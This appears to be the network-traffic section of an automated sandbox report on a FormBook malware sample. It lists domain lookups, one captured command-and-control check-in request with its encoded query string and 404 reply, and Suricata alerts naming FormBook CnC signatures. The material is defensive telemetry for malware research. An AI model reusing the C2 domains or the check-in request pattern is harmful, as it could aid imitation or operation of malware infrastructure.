Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.mnbvending.com | ||
| www.kaka.digital | ||
| www.1527brokenoakdrive.site | 172.67.187.223 |
GET
404
http://www.1527brokenoakdrive.site/nk6l/?w2J=jP0XjeSgSwb6GljuZIUzr+Wr4LOzEwTYnwZ8MMYm+mej+m4fHGukAN1SliFlR5pUPmwRfLY8&tFQh=YP4Hk0O8
REQUEST
RESPONSE
BODY
GET /nk6l/?w2J=jP0XjeSgSwb6GljuZIUzr+Wr4LOzEwTYnwZ8MMYm+mej+m4fHGukAN1SliFlR5pUPmwRfLY8&tFQh=YP4Hk0O8 HTTP/1.1
Host: www.1527brokenoakdrive.site
Connection: close
HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2021 04:04:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Nk3bAn7iC6caaFfei4ewPb%2FXPf%2FGi%2BnS7IDP%2FJxpJ7NmVa2QllNYhDrB6x%2BzDdNliu1P8CmA3QuW9YiZ0ZZ0yL08N4KimkPufim24fgxXgEwDshEqbwxs%2Bx%2FkGey9pBs1FE1ulxcT%2F7v%2FpJSN7I%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6ad51db45e331f76-NRT
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49165 -> 104.21.64.211:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49165 -> 104.21.64.211:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49165 -> 104.21.64.211:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts